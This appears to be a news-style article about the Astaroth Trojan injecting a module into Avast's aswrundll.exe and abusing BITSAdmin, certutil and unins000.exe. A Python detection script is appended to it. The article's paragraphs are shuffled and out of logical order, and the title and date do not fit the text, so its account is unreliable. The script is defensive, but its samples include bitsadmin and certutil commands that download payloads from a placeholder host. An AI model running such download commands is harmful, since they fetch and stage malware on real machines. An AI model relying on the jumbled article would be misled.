Avast ccleaner malware domain targets

3/19/2023

"Since this is not an exploit, there is no obligation for them to provide formal or advance communication," Avast said in a statement. "We learned about this particular Astaroth Trojan variant analyzed in Cybereason's report."

"It's a legitimate process with legitimate uses that's just being used for malicious purposes - in this case, to load and execute malicious modules," he explained. "However, just like regsvr32, it can be misused for malicious activity."

"It's not something that Avast needs to fix or patch, because this process is just part of their product; it's just like a Microsoft process that has the ability to be used maliciously," Salem said.

Salem said the Astaroth malware variant doesn't need to take advantage of a bug or vulnerability in code.

Upon successful infiltration, it logs user keystrokes, intercepts their operating system calls and gathers information to steal credentials, including passwords.

The Astaroth Trojan malware disguises its payload as JPEG, GIF and extensionless files to avoid detection, researchers found. This version maliciously used BITSAdmin to download the payload, while earlier versions of the campaign used certutil, Salem said.

"However, the recent variant that we found leverages its payload execution through targeted security-related products and obfuscates itself as much as it can at the remote server domain and changes some of its processes in doing so."

"Astaroth malware is very similar to other variants that we have seen since mid-2018 in terms of how it propagates itself," said Eli Salem, security researcher at Cybereason.

The campaign targeted Brazil and parts of Europe, and it gained momentum toward the end of 2018, according to a blog post detailing the research.

The spam campaign also made malicious use of unins000.exe, a process that belongs to GAS Tecnologia, a Brazilian information security company.

Earlier versions of the malware, which was first detected in 2017, would scan targeted systems for Avast and simply quit if the antivirus program was detected. Researchers said that because Avast is one of the most common antivirus programs in the world, this makes it an effective evasion strategy.

Reported by Cybereason's Nocturnus Research team earlier this week, the latest version of the Astaroth Trojan injects a malicious module into one of Avast's processes, aswrundll.exe.
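A defender-side check for the behaviours described above, as an added example that is not from the article or from Cybereason's report: it flags BITSAdmin or certutil downloads of JPEG, GIF or extensionless URLs, and aswrundll.exe or unins000.exe started with a module path outside their own install directory. The command lines are constructed samples, and the idea that the module is passed as a path argument is an assumption.

```python
import posixpath
import re
from pathlib import PureWindowsPath
from urllib.parse import urlsplit

DOWNLOADERS = {"bitsadmin.exe", "certutil.exe"}   # downloaders named in the article
DISGUISES = {".jpg", ".jpeg", ".gif", ""}         # JPEG, GIF, extensionless
LOADERS = {"aswrundll.exe", "unins000.exe"}       # trusted binaries named in the article


def tokens(cmdline):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify(cmdline):
    """Return a finding for one process-creation command line, or None."""
    parts = tokens(cmdline.lower())
    if not parts:
        return None
    exe = PureWindowsPath(parts[0])
    name = exe.name if exe.name.endswith(".exe") else exe.name + ".exe"
    for arg in parts[1:]:
        if name in DOWNLOADERS and re.match(r"https?://", arg):
            ext = posixpath.splitext(urlsplit(arg).path)[1]
            if ext in DISGUISES:
                return f"download-disguised:{name}:{ext or 'none'}"
        # Assumption: the module to load is passed as a path argument.
        if name in LOADERS and re.match(r"[a-z]:\\", arg):
            if exe.parent not in PureWindowsPath(arg).parents:
                return f"foreign-module:{name}"
    return None


# Constructed sample command lines (not taken from the report).
SAMPLES = [
    r'bitsadmin /transfer job1 /download /priority foreground http://example.test/img/a.jpg C:\Users\Public\a.jpg',
    r'certutil.exe -urlcache -split -f http://example.test/payload C:\Users\Public\p',
    r'"C:\Program Files\AVAST Software\Avast\aswRunDll.exe" "C:\Users\Public\Libraries\mod.dll"',
    r'"C:\Program Files\AVAST Software\Avast\aswRunDll.exe" "C:\Program Files\AVAST Software\Avast\example.dll"',
    r'bitsadmin /transfer upd /download http://example.test/update.cab C:\Temp\update.cab',
]


def scan(lines):
    """Return (finding, line) pairs for every flagged command line."""
    return [(classify(l), l) for l in lines if classify(l)]


if __name__ == "__main__":
    for finding, line in scan(SAMPLES):
        print(finding, "<-", line)
```

Both rules match legitimate activity too, so treat hits as leads to correlate with network and file telemetry.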